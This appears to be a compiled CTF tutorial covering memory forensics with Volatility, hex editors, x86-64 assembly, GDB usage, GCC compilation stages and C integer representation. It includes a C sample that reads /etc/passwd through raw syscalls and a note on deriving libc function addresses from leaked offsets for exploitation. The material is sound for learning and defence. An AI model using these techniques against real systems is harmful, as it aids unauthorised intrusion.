$ python vol.py -f ~/image.raw --profile=Win7SP0x64 memdump -p 2019 -D dump/
Volatility Foundation Volatility Framework 2.4
************************************************************************
Writing System [ 2019] to 2019.dmp
$ ls -alh dump/2019.dmp
-rw-r--r-- 1 user staff 111M Apr 22 20:47 dump/2019.dmp
Other Useful Commands
There are plenty of commands that Volatility offers but some highlights include:
- $ python vol.py -f IMAGE --profile=PROFILE connections: view network connections
- $ python vol.py -f IMAGE --profile=PROFILE cmdscan: view commands that were run in cmd prompt
Hex Editor
A hexadecimal (hex) editor (also called a binary file editor or byte editor) is a computer program you can use to manipulate the fundamental binary data that constitutes a computer file. The name “hex” comes from “hexadecimal,” a standard numerical format for representing binary data. A typical computer file occupies multiple areas on the platter(s) of a disk drive, whose contents are combined to form the file. Hex editors that are designed to parse and edit sector data from the physical segments of floppy or hard disks are sometimes called sector editors or disk editors. A hex editor is used to see or edit the raw, exact contents of a file. Hex editors may be used to correct data corrupted by a system or application. A list of editors can be found on the forensics Wiki. You can download one and install it on your system.
Example
Open fileA.jpg in a hex editor. (Most Hex editors have either a “File > Open” option or a simple drag and drop.)
When you open fileA.jpg in your hex editor, you should see something similar to this:
Your hex editor should also have a “go to” or “find” feature so you can jump to a specific byte.
Reverse Engineering
https://ctf101.org/reverse-engineering/overview/
Reverse Engineering in a CTF is typically the process of taking a compiled (machine code, bytecode) program and converting it back into a more human-readable format.
Very often the goal of a reverse engineering challenge is to understand the functionality of a given program such that you can identify deeper issues.
- Assembly / Machine Code
- The C Programming Language
- Disassemblers
- Decompilers
Assembly/Machine Code
Machine Code or Assembly is code that has been formatted for direct execution by a CPU. Machine Code is why readable programming languages like C, when compiled, cannot be reversed into source code (well Decompilers can sort of, but more on that later).
From Source to Compilation
Godbolt shows the differences in machine code generated by various compilers.
For example, if we have a simple C++ function:
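#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
int main() {
    char c;
    // Syscall 2 is open on x86-64 Linux; flags 0 means read-only
    int fd = syscall(2, "/etc/passwd", 0);
    // Syscall 0 is read: fetch one byte at a time until it returns 0 (end of file)
    while (syscall(0, fd, &c, 1)) {
        putchar(c);
    }
}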
We can see the compilation results in some verbose instructions for the CPU:
.LC0:
.string "/etc/passwd"
main:
push rbp
mov rbp, rsp
sub rsp, 16
mov edx, 0
mov esi, OFFSET FLAT:.LC0
mov edi, 2
mov eax, 0
call syscall
mov DWORD PTR [rbp-4], eax
.L3:
lea rdx, [rbp-5]
mov eax, DWORD PTR [rbp-4]
mov ecx, 1
mov esi, eax
mov edi, 0
mov eax, 0
call syscall
test rax, rax
setne al
test al, al
je .L2
movzx eax, BYTE PTR [rbp-5]
movsx eax, al
mov edi, eax
call putchar
jmp .L3
.L2:
mov eax, 0
leave
ret
This is a one-way process for compiled languages as there is no way to generate sources from machine code. While the machine code may seem unintelligible, the extremely basic functions can be interpreted with some practice.
x86-64
x86-64 (also called amd64 or x64) is a 64-bit Complex Instruction Set Computing (CISC) architecture. This basically means that the registers used for this architecture are an extra 32 bits wider than those of Intel's 32-bit x86 architecture. CISC means that a single instruction can do a bunch of different things at once, such as memory accesses, register reads, etc. It is also a variable-length instruction set, which means different instructions can be of different sizes, ranging from 1 to 15 bytes long. And finally, x86-64 allows for multi-sized register access, which means that you can access certain parts of a register that are different sizes.
x86-64 Registers
x86-64 registers behave similarly to other architectures. A key component of x86-64 registers is multi-sized access, meaning the register RAX can have its lower 32 bits accessed with EAX. The lower 16 bits can be accessed with AX and the lowest 8 bits can be accessed with AL, allowing the computer to make optimizations that boost program execution.
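The relationship between the sub-registers is just bit masking, which can be illustrated in Python. The value loaded into rax is an arbitrary example chosen so that every byte is distinct.

```python
rax = 0x1122334455667788  # arbitrary 64-bit example value

eax = rax & 0xFFFFFFFF    # lower 32 bits
ax = rax & 0xFFFF         # lower 16 bits
al = rax & 0xFF           # lowest 8 bits

print(hex(eax), hex(ax), hex(al))  # 0x55667788 0x7788 0x88
```

One x86-64 detail worth knowing when reading disassembly: writing to a 32-bit register such as EAX zeroes the upper 32 bits of RAX, while writing to AX or AL leaves the remaining bits untouched.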
x86-64 has plenty of registers, including rax, rbx, rcx, rdx, rdi, rsi, rsp, rip, r8-r15, and more! But some registers serve special purposes.
The special registers include:
- RIP: the instruction pointer
- RSP: the stack pointer
- RBP: the base pointer
Instructions
An instruction represents a single operation for the CPU to perform.
There are different types of instructions including:
- Data movement: mov rax, [rsp - 0x40]
- Arithmetic: add rbx, rcx
- Control-flow: jne 0x8000400
Because x86-64 is a CISC architecture, instructions can be quite complex for machine code, such as repne scasb, which repeats up to ECX times over memory at EDI looking for a NULL byte (0x00), decrementing ECX each byte (essentially strlen() in a single instruction!).
It is important to remember that an instruction really is just memory. This idea will become useful with Return Oriented Programming or ROP.
Instructions, numbers, strings, everything! Always represented in hex.
add rax, rbx == 48 01 d8
mov rax, 0xdeadbeef == 48 c7 c0 ef be ad de
mov rax, [0xdeadbeef] == 67 48 8b 05 ef be ad de
"Hello" == 48 65 6c 6c 6f
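Two of these byte sequences are easy to reproduce in Python, which also shows why 0xdeadbeef appears as ef be ad de inside the encoded instructions: x86-64 stores multi-byte values in little-endian order. The sketch needs Python 3.8 or newer for the separator argument of bytes.hex.

```python
import struct

# ASCII text is stored one byte per character, in reading order
hello = "Hello".encode("ascii").hex(" ")

# A 32-bit value packed little-endian, as it appears inside an instruction
imm32 = struct.pack("<I", 0xdeadbeef).hex(" ")

print(hello)  # 48 65 6c 6c 6f
print(imm32)  # ef be ad de
```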
Execution
What should the CPU execute? This is determined by the RIP register where IP means instruction pointer. Execution follows the pattern: fetch the instruction at the address in RIP, decode it, and run it.
Examples
mov rax, 0xdeadbeef
Here the operation mov is moving the "immediate" 0xdeadbeef into the register RAX.
mov rax, [0xdeadbeef + rbx * 4]
Here the operation mov is moving the data at the address of [0xdeadbeef + RBX*4] into the register RAX. When brackets are used, you can think of the program as getting the content from that effective address.
Example Execution
-> 0x0804000: mov eax, 0xdeadbeef            Register Values:
   0x0804005: mov ebx, 0x1234                RIP = 0x0804000
   0x080400a: add rax, rbx                   RAX = 0x0
   0x080400d: inc rbx                        RBX = 0x0
   0x0804010: sub rax, rbx                   RCX = 0x0
   0x0804013: mov rcx, rax                   RDX = 0x0

   0x0804000: mov eax, 0xdeadbeef            Register Values:
-> 0x0804005: mov ebx, 0x1234                RIP = 0x0804005
   0x080400a: add rax, rbx                   RAX = 0xdeadbeef
   0x080400d: inc rbx                        RBX = 0x0
   0x0804010: sub rax, rbx                   RCX = 0x0
   0x0804013: mov rcx, rax                   RDX = 0x0

   0x0804000: mov eax, 0xdeadbeef            Register Values:
   0x0804005: mov ebx, 0x1234                RIP = 0x080400a
-> 0x080400a: add rax, rbx                   RAX = 0xdeadbeef
   0x080400d: inc rbx                        RBX = 0x1234
   0x0804010: sub rax, rbx                   RCX = 0x0
   0x0804013: mov rcx, rax                   RDX = 0x0

   0x0804000: mov eax, 0xdeadbeef            Register Values:
   0x0804005: mov ebx, 0x1234                RIP = 0x080400d
   0x080400a: add rax, rbx                   RAX = 0xdeadd123
-> 0x080400d: inc rbx                        RBX = 0x1234
   0x0804010: sub rax, rbx                   RCX = 0x0
   0x0804013: mov rcx, rax                   RDX = 0x0

   0x0804000: mov eax, 0xdeadbeef            Register Values:
   0x0804005: mov ebx, 0x1234                RIP = 0x0804010
   0x080400a: add rax, rbx                   RAX = 0xdeadd123
   0x080400d: inc rbx                        RBX = 0x1235
-> 0x0804010: sub rax, rbx                   RCX = 0x0
   0x0804013: mov rcx, rax                   RDX = 0x0

   0x0804000: mov eax, 0xdeadbeef            Register Values:
   0x0804005: mov ebx, 0x1234                RIP = 0x0804013
   0x080400a: add rax, rbx                   RAX = 0xdeadbeee
   0x080400d: inc rbx                        RBX = 0x1235
   0x0804010: sub rax, rbx                   RCX = 0x0
-> 0x0804013: mov rcx, rax                   RDX = 0x0

   0x0804000: mov eax, 0xdeadbeef            Register Values:
   0x0804005: mov ebx, 0x1234                RIP = 0x0804016
   0x080400a: add rax, rbx                   RAX = 0xdeadbeee
   0x080400d: inc rbx                        RBX = 0x1235
   0x0804010: sub rax, rbx                   RCX = 0xdeadbeee
   0x0804013: mov rcx, rax                   RDX = 0x0
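The fetch, decode, and run cycle traced above can be mimicked with a small Python interpreter. This is a toy model under stated assumptions: instructions are pre-decoded tuples rather than real machine code, the instruction sizes are taken from the address gaps in the listing, only the four operations used here are handled, and the writes to eax and ebx are modelled as writes to rax and rbx because a 32-bit write zeroes the upper half of the 64-bit register.

```python
MASK64 = (1 << 64) - 1

# (address, size in bytes, operation, destination, source)
program = [
    (0x0804000, 5, "mov", "rax", 0xdeadbeef),
    (0x0804005, 5, "mov", "rbx", 0x1234),
    (0x080400a, 3, "add", "rax", "rbx"),
    (0x080400d, 3, "inc", "rbx", None),
    (0x0804010, 3, "sub", "rax", "rbx"),
    (0x0804013, 3, "mov", "rcx", "rax"),
]

def run(program):
    regs = {"rax": 0, "rbx": 0, "rcx": 0, "rdx": 0, "rip": program[0][0]}
    by_addr = {ins[0]: ins for ins in program}
    while regs["rip"] in by_addr:
        addr, size, op, dst, src = by_addr[regs["rip"]]  # fetch and decode
        regs["rip"] = addr + size                        # RIP now points at the next instruction
        value = regs[src] if isinstance(src, str) else src
        if op == "mov":
            regs[dst] = value
        elif op == "add":
            regs[dst] = (regs[dst] + value) & MASK64
        elif op == "sub":
            regs[dst] = (regs[dst] - value) & MASK64
        elif op == "inc":
            regs[dst] = (regs[dst] + 1) & MASK64
    return regs

final = run(program)
print({name: hex(value) for name, value in final.items()})
```

Execution stops when RIP points past the last instruction in the table; a real CPU would simply keep fetching whatever bytes come next in memory.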
Control Flow
How can we express conditionals in x86-64? We use conditional jumps such as:
- jnz <address>
- je <address>
- jge <address>
- jle <address>
- etc.
They jump if their condition is true and just go to the next instruction otherwise. These conditionals check EFLAGS, a special register that stores flags set by certain instructions, such as add rax, rbx, which sets the o (overflow) flag if the signed sum is too large for a 64-bit register to hold and wraps around. You can jump based on that with a jo instruction. The most important thing to remember is the cmp instruction:
cmp rax, rbx
jle error
This assembly jumps if RAX <= RBX (compared as signed integers).
Addresses
Memory acts similarly to a big array where the indices of this "array" are memory addresses. Remember from earlier:
mov rax, [0xdeadbeef]
The square brackets mean "get the data at this address". This is analogous to the C/C++ syntax: rax = *(uint64_t *)0xdeadbeef;
Disassemblers
A disassembler is a tool that translates the machine code of a compiled program back into human-readable assembly.
List of Disassemblers
- IDA
- Binary Ninja
- GNU Debugger (GDB)
- radare2
- Hopper
IDA
The Interactive Disassembler (IDA) is the industry standard for binary disassembly. IDA is capable of disassembling "virtually any popular file format". This makes it very useful to security researchers and CTF players who often need to analyze obscure files without knowing what they are or where they came from. IDA also features the industry-leading Hex-Rays decompiler which can convert assembly code back into a pseudo code-like format.
IDA also has a plugin interface which has been used to create some successful plugins that can make reverse engineering easier:
- https://github.com/google/binnavi
- https://github.com/yegord/snowman
- https://github.com/gaasedelen/lighthouse
- https://github.com/joxeankoret/diaphora
- https://github.com/REhints/HexRaysCodeXplorer
- https://github.com/osirislab/Fentanyl
Binary Ninja
Binary Ninja is an up-and-coming disassembler that attempts to bring a new, more programmatic approach to reverse engineering. Binary Ninja brings an improved plugin API and modern features to reverse engineering. While it's not as popular or as old as IDA, Binary Ninja (often called binja) is quickly gaining ground and has a small community of dedicated users and followers.
Binja also has some community-contributed plugins which are collected here: https://github.com/Vector35/community-plugins
gdb
The GNU Debugger is a free and open-source debugger that also disassembles programs. It's capable as a disassembler, but most notably it is used by CTF players for its debugging and dynamic analysis capabilities.
gdb is often used in tandem with enhancement scripts like peda, pwndbg, and GEF.
The GNU Debugger (GDB)
The GNU Debugger or GDB is a powerful debugger that allows for the step-by-step execution of a program. It can be used to trace program execution and is an important part of any reverse engineering toolkit.
Vanilla GDB
GDB without any modifications is unintuitive and obscures a lot of useful information. The plug-in pwndbg solves a lot of these problems and makes for a much more pleasant experience. But if you are constrained and have to use vanilla gdb, here are several things to make your life easier.
Starting GDB
To start GDB on a program, simply run gdb [program]
Disassembly
(gdb) disassemble [address/symbol]
displays the disassembly for that function or frame.
GDB accepts unambiguous command abbreviations, so (gdb) disas main
is enough to see the disassembly of main.
View Disassembly During Execution
Another handy thing to see while stepping through a program is the disassembly of nearby instructions:
(gdb) display/[# of instructions]i $pc [± offset]
- display shows data with each step
- /[#]i shows how much data to print, in the format i for instruction
- $pc means the pc, program counter, register
- [± offset] allows you to specify how you would like the data offset from the current instruction
Example Usage
(gdb) display/10i $pc - 0x5
This command shows 10 instructions on screen, starting 5 bytes before the next instruction to execute, giving us this display:
0x8048535 <main+6>: lock pushl -0x4(%ecx)
0x8048539 <main+10>: push %ebp
=> 0x804853a <main+11>: mov %esp,%ebp
0x804853c <main+13>: push %ecx
0x804853d <main+14>: sub $0x14,%esp
0x8048540 <main+17>: sub $0xc,%esp
0x8048543 <main+20>: push $0x400
0x8048548 <main+25>: call 0x80483a0 <malloc@plt>
0x804854d <main+30>: add $0x10,%esp
0x8048550 <main+33>: sub $0xc,%esp
Deleting Views
If, for whatever reason, a view no longer suits your needs, simply call (gdb) info display
which will give you a list of active displays:
Auto-display expressions now in effect:
Num Enb Expression
1: y /10bi $pc-0x5
Then simply execute (gdb) delete display 1
and your execution will resume without the display.
Registers
In order to view the state of registers with vanilla gdb, you need to run the command info registers
which will display the state of all the registers:
eax 0xf77a6ddc -142971428
ecx 0xffe06b10 -2069744
edx 0xffe06b34 -2069708
ebx 0x0 0
esp 0xffe06af8 0xffe06af8
ebp 0x0 0x0
esi 0xf77a5000 -142979072
edi 0xf77a5000 -142979072
eip 0x804853a 0x804853a <main+11>
eflags 0x286 [ PF SF IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
If you would simply like to see the contents of a single register, use the notation p/x $[register]
where:
- p/x means to print the value in hex notation
- $[register] is the register code such as eax, rax, etc.
Note that x/x $[register] instead examines the memory at the address held in that register.
Pwndbg
These commands work with vanilla gdb as well.
Setting Breakpoints
Setting breakpoints in GDB uses the format b*[Address/Symbol]
Example Usage
- (gdb) b*main: Break at the start of main
- (gdb) b*0x804854d: Break at 0x804854d
- (gdb) b*0x804854d-0x100: Break at 0x804844d
Deleting Breakpoints
As with displays, in order to delete a breakpoint, first list the available breakpoints using (gdb) info breakpoints
(don't forget that GDB accepts abbreviations, so you don't always need to type out every command!) which will display all breakpoints:
Num Type Disp Enb Address What
1 breakpoint keep y 0x0804852f <main>
3 breakpoint keep y 0x0804864d <__libc_csu_init+61>
Then simply execute (gdb) delete 1
Note
GDB creates breakpoints chronologically and does NOT reuse numbers.
Stepping
What good is a debugger if you can't control where you are going? To begin executing a program, use the command r [arguments], just as you would run it with dot-slash notation as ./program [arguments]. If no breakpoints are set, the program simply runs normally. If you have breakpoints set, execution stops at the first one that is hit.
- (gdb) continue [# of breakpoints]: Resumes the execution of the program until it finishes or until another breakpoint is hit (shorthand c)
- (gdb) stepi [# of instructions]: Steps into an instruction the specified number of times, default is 1 (shorthand si; plain step, shorthand s, advances by source line instead)
- (gdb) nexti [# of instructions]: Steps over an instruction, meaning it will not delve into called functions (shorthand ni)
- (gdb) finish: Finishes a function and breaks after it returns (shorthand fin)
Examining
Examining data in GDB is also very useful for seeing how the program is affecting data. The notation may seem complex at first, but it is flexible and provides powerful functionality.
(gdb) x/[#][size][format] [Address/Symbol/Register][± offset]
- x/ means examine
- [#] means how much
- [size] means what size each unit of data should be: a byte b (1 byte), a halfword h (2 bytes), a word w (4 bytes), or a giant word g (8 bytes)
- [format] means how the data should be interpreted, such as an instruction i, a string s, or hex x
- [Address/Symbol/Register][± offset] means where to start interpreting the data
Example Usage
- (gdb) x/x $rax: Displays the memory at the address held in RAX as hex
- (gdb) x/i 0xdeadbeef: Displays the instruction at address 0xdeadbeef
- (gdb) x/10s 0x893e10: Displays 10 strings at the address
- (gdb) x/10gx 0x7fe10: Displays 10 giant words as hex at the address
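To see what the count and size fields of the x command control, here is a rough model of how raw bytes are grouped into units. It is a sketch, not GDB's implementation: the `examine` function and the sample bytes are invented for illustration, and it assumes a little-endian target and GDB's size letters b, h, w, and g (1, 2, 4, and 8 bytes).

```python
import struct

# GDB size letters mapped to struct format codes: (code, width in bytes).
SIZES = {"b": ("B", 1), "h": ("H", 2), "w": ("I", 4), "g": ("Q", 8)}

def examine(data, count, size):
    """Roughly what x/<count><size>x prints: `count` little-endian units as hex."""
    code, _width = SIZES[size]
    values = struct.unpack_from("<" + code * count, data)
    return [hex(v) for v in values]

data = bytes(range(16))          # hypothetical memory: 00 01 02 ... 0f
print(examine(data, 2, "g"))     # like x/2gx
print(examine(data, 4, "w"))     # like x/4wx
```

The same 16 bytes read as two giant words or four words give different numbers, which is why picking the right size matters when reading pointers off the stack or heap.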
Forking
If the program happens to be an accept-and-fork server, gdb will have issues following the child or parent processes. To specify which process gdb should follow after a fork, use the command set follow-fork-mode [parent/child]
Setting Data
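If you would like to set data at any point, it is possible using the command set [Register/Memory location]=[Hex Data]. A raw memory address needs a type in braces, as in {int}[Address], so that gdb knows how many bytes to write.
Example Usage
- set $rax=0x0: Sets the register rax to 0
- set {int}0x1e4a70=0x123: Sets the 4-byte integer at 0x1e4a70 to 0x123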
Process Mapping
A handy way to find the process's mapped address spaces is to use info proc map:
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x8048000 0x8049000 0x1000 0x0 /directory/program
0x8049000 0x804a000 0x1000 0x0 /directory/program
0x804a000 0x804b000 0x1000 0x1000 /directory/program
0xf75cb000 0xf75cc000 0x1000 0x0
0xf75cc000 0xf7779000 0x1ad000 0x0 /lib32/libc-2.23.so
0xf7779000 0xf777b000 0x2000 0x1ac000 /lib32/libc-2.23.so
0xf777b000 0xf777c000 0x1000 0x1ae000 /lib32/libc-2.23.so
0xf777c000 0xf7780000 0x4000 0x0
0xf778b000 0xf778d000 0x2000 0x0 [vvar]
0xf778d000 0xf778f000 0x2000 0x0 [vdso]
0xf778f000 0xf77b1000 0x22000 0x0 /lib32/ld-2.23.so
0xf77b1000 0xf77b2000 0x1000 0x0
0xf77b2000 0xf77b3000 0x1000 0x22000 /lib32/ld-2.23.so
0xf77b3000 0xf77b4000 0x1000 0x23000 /lib32/ld-2.23.so
0xffc59000 0xffc7a000 0x21000 0x0 [stack]
This will show you where the stack, heap (if there is one), and libc are located.
Attaching Processes
Another useful feature of GDB is attaching to processes that are already running. Simply launch gdb using gdb, then find the process id of the program you would like to attach to and execute attach [pid].
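Reverse Engineering and Assembly Language
C Language Basics
From Source Code to Executable
We use "Hello World", the first program in the classic book The C Programming Language, to walk through how GCC compiles a program on Linux.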
#include <stdio.h>
main()
{
printf("hello, world\n");
}
$ gcc hello.c
$ ./a.out
hello, world
This process can be divided into 4 steps: preprocessing, compilation, assembly, and linking.
Preprocessing
gcc -E hello.c -o hello.i
# 1 "hello.c"
# 1 "<built-in>"
# 1 "<command-line>"
......
extern int printf (const char *__restrict __format, ...);
......
main() {
printf("hello, world\n");
}
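Preprocessing mainly handles the directives in the source code that begin with "#":
- Remove every "#define" and expand all macro definitions.
- Process all conditional directives such as "#if", "#ifdef", "#elif", "#else", and "#endif".
- Process "#include" directives by inserting the included file at the position of the directive. Note that this is done recursively.
- Remove all comments.
- Add line numbers and file name markers.
- Keep all #pragma compiler directives.
Compilation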
gcc -S hello.c -o hello.s
.file "hello.c"
.section .rodata
.LC0:
.string "hello, world"
.text
.globl main
.type main, @function
main:
.LFB0:
.cfi_startproc
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset 6, -16
movq %rsp, %rbp
.cfi_def_cfa_register 6
leaq .LC0(%rip), %rdi
call puts@PLT
movl $0, %eax
popq %rbp
.cfi_def_cfa 7, 8
ret
.cfi_endproc
.LFE0:
.size main, .-main
.ident "GCC: (GNU) 7.2.0"
.section .note.GNU-stack,"",@progbits
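Compilation takes the preprocessed file through lexical analysis, syntax analysis, semantic analysis, and optimization, and produces the corresponding assembly file.
Assembly
$ gcc -c hello.s -o hello.o
or
$ gcc -c hello.c -o hello.o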
$ objdump -sd hello.o
hello.o: file format elf64-x86-64
Contents of section .text:
0000 554889e5 488d3d00 000000e8 00000000 UH..H.=.........
0010 b8000000 005dc3 .....].
Contents of section .rodata:
0000 68656c6c 6f2c2077 6f726c64 00 hello, world.
Contents of section .comment:
0000 00474343 3a202847 4e552920 372e322e .GCC: (GNU) 7.2.
0010 3000 0.
Contents of section .eh_frame:
0000 14000000 00000000 017a5200 01781001 .........zR..x..
0010 1b0c0708 90010000 1c000000 1c000000 ................
0020 00000000 17000000 00410e10 8602430d .........A....C.
0030 06520c07 08000000 .R......
Disassembly of section .text:
0000000000000000 <main>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: 48 8d 3d 00 00 00 00 lea 0x0(%rip),%rdi # b <main+0xb>
b: e8 00 00 00 00 callq 10 <main+0x10>
10: b8 00 00 00 00 mov $0x0,%eax
15: 5d pop %rbp
16: c3 retq
The assembler translates the assembly code into instructions the machine can execute.
Linking
gcc hello.o -o hello
$ objdump -d -j .text hello
......
000000000000064a <main>:
64a: 55 push %rbp
64b: 48 89 e5 mov %rsp,%rbp
64e: 48 8d 3d 9f 00 00 00 lea 0x9f(%rip),%rdi # 6f4 <_IO_stdin_used+0x4>
655: e8 d6 fe ff ff callq 530 <puts@plt>
65a: b8 00 00 00 00 mov $0x0,%eax
65f: 5d pop %rbp
660: c3 retq
661: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
668: 00 00 00
66b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)
......
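An object file has to be linked with many other files to produce the final executable (only the linked main function is shown above; compare it with the main function in hello.o). Linking mainly consists of address and storage allocation, symbol resolution, and relocation.
gcc Tips
Normally only the executable is produced after compilation, and the intermediate .i, .s, and .o files are not kept. The -save-temps option keeps these temporary intermediate files permanently.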
$ gcc -save-temps hello.c
$ ls
a.out hello.c hello.i hello.o hello.s
Note that gcc links dynamically by default, so the a.out produced here is actually reported as a shared object file.
$ file a.out
a.out: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=533aa4ca46d513b1276d14657ec41298cafd98b1, not stripped
The --verbose option prints gcc's detailed workflow.
gcc hello.c -static --verbose
There is a lot of output; we mainly care about the following lines:
$ /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/cc1 -quiet -v hello.c -quiet -dumpbase hello.c -mtune=generic -march=x86-64 -auxbase hello -version -o /tmp/ccj1jUMo.s
as -v --64 -o /tmp/ccAmXrfa.o /tmp/ccj1jUMo.s
/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/collect2 -plugin /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/liblto_plugin.so -plugin-opt=/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/lto-wrapper -plugin-opt=-fresolution=/tmp/cc1l5oJV.res -plugin-opt=-pass-through=-lgcc -plugin-opt=-pass-through=-lgcc_eh -plugin-opt=-pass-through=-lc --build-id --hash-style=gnu -m elf_x86_64 -static /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/../../../../lib/crt1.o /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/../../../../lib/crti.o /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/crtbeginT.o -L/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0 -L/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/../../../../lib -L/lib/../lib -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/../../.. /tmp/ccAmXrfa.o --start-group -lgcc -lgcc_eh -lc --end-group /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/crtend.o /usr/lib/gcc/x86_64-pc-linux-gnu/7.2.0/../../../../lib/crtn.o
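The three commands are cc1, as, and collect2. cc1 is gcc's compiler and compiles the .c file into a .s file; as is the assembler and assembles the .s file into a .o file; collect2 is the linker command, a wrapper around ld. For static linking, gcc links 5 important object files of the C runtime (crt1.o, crti.o, crtbeginT.o, crtend.o, and crtn.o) and the 3 static libraries named by -lgcc, -lgcc_eh, and -lc into the executable.
ELF files are covered in more detail in section 1.5.3.
C Standard Library
The C runtime library (CRT) is a large body of code that supports the normal execution of programs. The C standard library is its most important part.
Commonly used standard library headers:
- Standard input/output (stdio.h)
- Character handling (ctype.h)
- String handling (string.h)
- Math functions (math.h)
- General utilities (stdlib.h)
- Time/date (time.h)
- Assertions (assert.h)
- Limits of the various types (limits.h & float.h)
- Variable arguments (stdarg.h)
- Non-local jumps (setjmp.h)
glibc, the GNU C Library, is a C standard library developed for the GNU operating system. It consists of two main parts: the header files, located in /usr/include, and the library binaries. The binaries are mainly the C standard library, in dynamic and static versions: the dynamic version is located at /lib/libc.so.6 and the static version at /usr/lib/libc.a.
During exploitation, we usually obtain the virtual address of a target function by computing its offset from a function whose address is already known within the same libc. For this the local libc version must match the remote one; you can leak the addresses of a few functions and then search for them on libcdb.com to identify the version.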
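The offset arithmetic described above fits in a few lines. The sketch below is only illustrative: the function name `resolve_target`, the leaked address, and both offsets are made-up values, not taken from any real libc build.

```python
def resolve_target(leaked_addr, leaked_offset, target_offset):
    """Derive the libc base from one leaked function address, then locate another function."""
    libc_base = leaked_addr - leaked_offset
    # A plausible base is page aligned; anything else suggests a wrong libc version.
    if libc_base & 0xFFF:
        raise ValueError("libc base is not page aligned; offsets probably do not match")
    return libc_base, libc_base + target_offset

# Hypothetical numbers for illustration only.
PUTS_OFFSET = 0x5F140      # assumed offset of puts inside libc
SYSTEM_OFFSET = 0x3A940    # assumed offset of system inside libc
leaked_puts = 0xF762B140   # pretend this address was leaked at runtime

base, system_addr = resolve_target(leaked_puts, PUTS_OFFSET, SYSTEM_OFFSET)
print(hex(base), hex(system_addr))
```

The alignment check is a cheap sanity test: if the computed base does not end in 000, the offsets most likely come from a different libc version than the one the target is running.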
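Integer Representation
By default, integers in C are signed. Below we declare a signed integer and an unsigned integer:
int var1 = 0;
unsigned int var2 = 0;
- Signed integers
- Can represent positive or negative values
- Range of int: -2,147,483,648 ~ 2,147,483,647
- Unsigned integers
- Can only represent zero or positive values
- Range of unsigned int: 0 ~ 4,294,967,295
Whether an integer type is signed or unsigned depends on whether it can carry a +/- sign:
- Signed
- int
- signed int
- long
- Unsigned
- uint
- unsigned int
- unsigned long
In a signed int, the most significant bit is called the sign bit. When the sign bit is set to 1 the value is negative, and when it is 0 the value is non-negative:
- 0x7FFFFFFF = 2147483647
- 01111111111111111111111111111111
- 0x80000000 = -2147483648
- 10000000000000000000000000000000
- 0xFFFFFFFF = -1
- 11111111111111111111111111111111
Two's complement represents negative numbers in a way that suits a binary adder: adding a negative number in two's complement form to the positive number of equal magnitude gives 0. To get the two's complement of a number, write the positive number in binary, invert all the bits, and then add 1: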
eg: 0x00123456
= 1193046
= 00000000000100100011010001010110
~= 11111111111011011100101110101001
+= 11111111111011011100101110101010
= -1193046 (0xFFEDCBAA)
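The invert-and-add-one rule can be checked mechanically. The following is a small sketch assuming 32-bit integers; `negate` and `to_signed` are names chosen here for illustration.

```python
def negate(value, bits=32):
    """Two's complement negation: invert every bit, add 1, keep only `bits` bits."""
    mask = (1 << bits) - 1
    return (~value + 1) & mask

def to_signed(value, bits=32):
    """Interpret a `bits`-wide bit pattern as a signed integer."""
    sign_bit = 1 << (bits - 1)
    return (value & (sign_bit - 1)) - (value & sign_bit)

pattern = negate(0x00123456)
print(hex(pattern), to_signed(pattern))   # 0xffedcbaa -1193046
print(to_signed(0x80000000))              # -2147483648
```

Adding a value to its negation and discarding the carry out of bit 31 gives 0, which is the property that lets a plain binary adder handle signed numbers.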
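The compiler uses the variable's type information to pick the matching instructions:
- Signed instructions
- IDIV: signed divide
- IMUL: signed multiply
- SAL: arithmetic left shift (same operation as SHL)
- SAR: arithmetic right shift (preserves the sign)
- MOVSX: move with sign extension
- JL: jump if less
- JLE: jump if less or equal
- JG: jump if greater
- JGE: jump if greater or equal
- Unsigned instructions
- DIV: unsigned divide
- MUL: unsigned multiply
- SHL: logical left shift
- SHR: logical right shift
- MOVZX: move with zero extension
- JB: jump if below
- JBE: jump if below or equal
- JA: jump if above
- JAE: jump if above or equal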
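The signed and unsigned variants exist because the same 32 bits mean different things under each interpretation. The sketch below models two of the pairs from the lists above; the helper names are invented for illustration and the model ignores the flags register.

```python
MASK32 = 0xFFFFFFFF

def to_signed32(value):
    value &= MASK32
    return value - (1 << 32) if value & 0x80000000 else value

def shr(value, count):
    """Logical right shift: vacated high bits are filled with 0."""
    return (value & MASK32) >> count

def sar(value, count):
    """Arithmetic right shift: vacated high bits copy the sign bit."""
    return (to_signed32(value) >> count) & MASK32

def jb_taken(a, b):
    """JB after comparing a with b: unsigned 'below'."""
    return (a & MASK32) < (b & MASK32)

def jl_taken(a, b):
    """JL after comparing a with b: signed 'less'."""
    return to_signed32(a) < to_signed32(b)

print(hex(shr(0x80000000, 4)), hex(sar(0x80000000, 4)))  # 0x8000000 0xf8000000
print(jb_taken(0xFFFFFFFF, 1), jl_taken(0xFFFFFFFF, 1))  # False True
```

0xFFFFFFFF is the largest unsigned value but is -1 when signed, so a bounds check compiled with the wrong signedness can be bypassed with a negative number.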
Integer data types on a 32-bit machine (these can differ between systems):
C data type | Minimum value | Maximum value | Minimum size |
---|---|---|---|
char | -128 | 127 | 8 bits |
short | -32 768 | 32 767 | 16 bits |
int | -2 147 483 648 | 2 147 483 647 | 16 bits |
long | -2 147 483 648 | 2 147 483 647 | 32 bits |
long long | -9 223 372 036 854 775 808 | 9 223 372 036 854 775 807 | 64 bits |
Fixed-size data types:
